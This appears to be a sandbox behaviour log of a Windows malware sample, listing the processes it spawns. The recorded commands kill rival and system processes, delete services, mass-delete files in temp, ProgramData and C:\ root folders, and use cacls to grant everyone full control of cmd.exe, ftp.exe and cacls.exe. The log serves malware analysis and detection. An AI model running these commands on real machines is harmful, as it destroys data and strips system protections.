C:\Windows\SysWOW64\taskkill.exetaskkill /f /im SvidaPctb.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q %ProgramFiles%\Microsoft SvidaPctb\SvidaPctb.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Program Files\Microsoft SvidaPctb\SvidaPctb.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Program Files (x86)\Microsoft SvidaPctb\SvidaPctb.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im WavesSys.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im WavesSys.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c sc delete "Corporati Assemblies WavesSys"2⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Corporati Assemblies WavesSys"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\cmd.execmd /c sc delete "Corporati Assemblies WavesSys"2⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Corporati Assemblies WavesSys"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im System.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im System.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q %ProgramFiles%\Microsoft StuSystem\System.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Program Files (x86)\Microsoft StuSystem\System.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Program Files\Microsoft StuSystem\System.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im Nvdxgiwrap.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Nvdxgiwrap.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c sc delete "Corporati Windows Nvdxgiwrap"2⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Corporati Windows Nvdxgiwrap"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\cmd.execmd /c sc delete "Corporati Windows Nvdxgiwrap"2⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Corporati Windows Nvdxgiwrap"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\cmd.execmd /c sc delete "Corporati Windows Rsytvcem"2⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Corporati Windows Rsytvcem"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\cmd.execmd /c sc delete "Corporati Windows Rsytvcem"2⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Corporati Windows Rsytvcem"3⤵
- Launches sc.exe
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im Rsytvcp.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Rsytvcp.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Program Files\Microsoft Rsytvcem\Rsytvcp.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im Systen64.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Systen64.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Program Files (x86)\Microsoft Rsytvcem\Rsytvcp.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q %ProgramFiles%\Microsoft Rsytvcem\Rsytvcp.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Program Files\Microsoft SystenApp\Systen64.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im spoolys.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im spoolys.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Program Files (x86)\Microsoft SystenApp\Systen64.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q %ProgramFiles%\Microsoft SystenApp\Systen64.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Windows\Help\spoolys.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im lsma12.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im lsma12.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Windows\INF\aspnet\lsma12.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im lsma22.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im lsma22.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Windows\INF\aspnet\lsma22.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im assm.exe2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im assm.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\DATA\SqlManagement\assm.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q %ProgramFiles%\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\DATA\SqlManagement\assm.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im sqlcmd.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im sqlcmd.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\DATA\SqlManagement\sqlcmd.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q %ProgramFiles%\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\DATA\SqlManagement\sqlcmd.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im conhos.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im conhos.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im conhos.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im conhos.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im conhou.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im conhou.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im conhou.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im conhou.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im m6.bin.bin.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im m6.bin.bin.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im javaw.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im javaw.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im clsso.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im clsso.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im conhoz.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im conhoz.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im conhoz.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im conhoz.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im conhoz.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im conhoz.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im conhoz.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im conhoz.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im conhoy.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im conhoy.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im conhoy.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im conhoy.exe3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im csrs.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im csrs.exe3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im csrs.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im csrs.exe3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im sysdo.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im sysdo.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\ftp.exe /e /t /g everyone:f4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im sysdo.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im sysdo.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im SqlManagement.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im SqlManagement.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\DATA\SqlManagement\sSqlManagement.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q %ProgramFiles%\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\DATA\SqlManagement\SqlManagement.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im SystemManagement.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im SystemManagement.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\DATA\SqlManagement\SystemManagement.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q %ProgramFiles%\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\DATA\SqlManagement\SystemManagement.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q %ProgramFiles%\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\DATA\SqlManagement\*2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im taskmgr.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im taskmgr.exe3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\ProgramData\*.vbs2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\ProgramData\*.json2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\*.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\ProgramData\*.ini2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\ProgramData\*.bat2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\ProgramData\*.txt2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\ProgramData\*.dll2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\RECYCLER\*.vbs2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\*.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\RECYCLER\*.ini2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\RECYCLER\*.json2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\RECYCLER\*.bat2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\RECYCLER\*.txt2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\RECYCLER\*.dll2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:/*.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:/RECYCLER/*.ini2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:/RECYCLER/*.json2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:/RECYCLER/*.bat2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:/RECYCLER/*.txt2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:/RECYCLER/*.dll2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:/RECYCLER/*.vbs2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im wscript.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im wscript.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im SQLAGENTSWD.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im SQLAGENTSWD.exe3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im SQLAGENTSWA.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im SQLAGENTSWA.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im SQLAGENTSWB.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im SQLAGENTSWB.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im SQLAGENTSWC.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im SQLAGENTSWC.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im SQLAGENAC.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im SQLAGENAC.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\MSSQL~1\AppData\Local\Temp\sqlagentc.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\MSSQL~1\AppData\Local\Temp\sqlagentc.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Windows\Temp\sqlagentc.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\Temp\sqlagentc.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\Administrator\AppData\Local\Temp\2\sqlagentc.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Administrator\AppData\Local\Temp\2\sqlagentc.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\Administrator\AppData\Local\Temp\2\sqlagentc.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Administrator\AppData\Local\Temp\2\sqlagentc.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\ftp.exe /e /t /g system:f4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\Administrator\AppData\Local\Temp\1\sqlagentc.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Administrator\AppData\Local\Temp\1\sqlagentc.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\Administrator\AppData\Local\Temp\1\sqlagentc.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Administrator\AppData\Local\Temp\1\sqlagentc.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\Administrator\AppData\Local\Temp\sqlagentc.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Administrator\AppData\Local\Temp\sqlagentc.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\Administrator\AppData\Local\Temp\sqlagentc.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Administrator\AppData\Local\Temp\sqlagentc.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\sqlagentc.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\sqlagentc.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\sqlagentc.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\sqlagentc.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Windows\Temp\sqlagentc.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\Temp\sqlagentc.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\MSSQLSERVER\AppData\Local\Temp\sqlagentc.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\MSSQLSERVER\AppData\Local\Temp\sqlagentc.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\MSSQLSERVER\AppData\Local\Temp\sqlagentc.exe /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\MSSQLSERVER\AppData\Local\Temp\sqlagentc.exe /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\MSSQL~1\AppData\Local\Temp\sqlagentc.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\MSSQL~1\AppData\Local\Temp\sqlagentc.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im SQLAGENTC.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im SQLAGENTC.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im SQLAGENTC.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im SQLAGENTC.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im SQLAGENTN.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im SQLAGENTN.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im SQLAGENTN.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im SQLAGENTN.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im SQLAGENTA.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im SQLAGENTA.exe3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im SQLAGENTA.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im SQLAGENTA.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\MSSQL~1\AppData\Local\Temp\SQLAGEATC.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\MSSQL~1\AppData\Local\Temp\SQLAGEATC.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\MSSQLSERVER\AppData\Local\Temp\SQLAGEATC.exe /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\MSSQLSERVER\AppData\Local\Temp\SQLAGEATC.exe /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\MSSQL~1\AppData\Local\Temp\SQLAGEATC.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\MSSQL~1\AppData\Local\Temp\SQLAGEATC.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\MSSQLSERVER\AppData\Local\Temp\SQLAGEATC.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\MSSQLSERVER\AppData\Local\Temp\SQLAGEATC.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Windows\Temp\SQLAGEATC.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\Temp\SQLAGEATC.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Windows\Temp\SQLAGEATC.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\Temp\SQLAGEATC.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\SQLAGEATC.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\SQLAGEATC.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im SQLAGEATC.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im SQLAGEATC.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im SQLAGEATC.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im SQLAGEATC.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\Administrator\AppData\Local\Temp\2\SQLAGEATC.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Administrator\AppData\Local\Temp\2\SQLAGEATC.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\Administrator\AppData\Local\Temp\2\SQLAGEATC.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Administrator\AppData\Local\Temp\2\SQLAGEATC.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\Administrator\AppData\Local\Temp\1\SQLAGEATC.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Administrator\AppData\Local\Temp\1\SQLAGEATC.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\Administrator\AppData\Local\Temp\1\SQLAGEATC.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Administrator\AppData\Local\Temp\1\SQLAGEATC.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\Administrator\AppData\Local\Temp\SQLAGEATC.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Administrator\AppData\Local\Temp\SQLAGEATC.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\Administrator\AppData\Local\Temp\SQLAGEATC.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Administrator\AppData\Local\Temp\SQLAGEATC.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\SQLAGEATC.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\SQLAGEATC.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im SQLAGEATN.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im SQLAGEATN.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im SQLAGEATN.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im SQLAGEATN.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im SQLAGEATA.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im SQLAGEATA.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im SQLAGEATA.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im SQLAGEATA.exe3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Users\MSSQL~1\AppData\Local\Temp\*2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Users\MSSQLSERVER\AppData\Local\Temp\*2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Windows\Temp\*2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\*2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Users\Administrator\AppData\Local\Temp\*2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Local\TempUpdate2.bat2⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Windows\system32\@cacls.exe" /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Windows\SysWOW64\@cacls.exe" /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Windows\system32\@cacls.exe" /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Windows\SysWOW64\@cacls.exe" /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Windows\system32\@cacls.exe" /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Windows\SysWOW64\@cacls.exe" /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Windows\system32\@cacls.exe" /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Windows\SysWOW64\@cacls.exe" /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Windows\system32\cmd.exe" /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Windows\SysWOW64\cmd.exe" /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Windows\system32\cmd.exe" /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Windows\SysWOW64\cmd.exe" /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Windows\system32\cmd.exe" /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Windows\SysWOW64\cmd.exe" /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Windows\system32\cmd.exe" /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Windows\SysWOW64\cmd.exe" /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Windows\system32\ftp.exe" /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\ftp.exe /e /t /g everyone:f4⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Windows\SysWOW64\ftp.exe" /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Windows\system32\ftp.exe" /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\ftp.exe /e /t /g system:f4⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Windows\SysWOW64\ftp.exe" /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\ftp.exe /e /t /g system:f4⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Windows\system32\ftp.exe" /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Windows\SysWOW64\ftp.exe" /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Windows\system32\ftp.exe" /e /t /g system:f3⤵
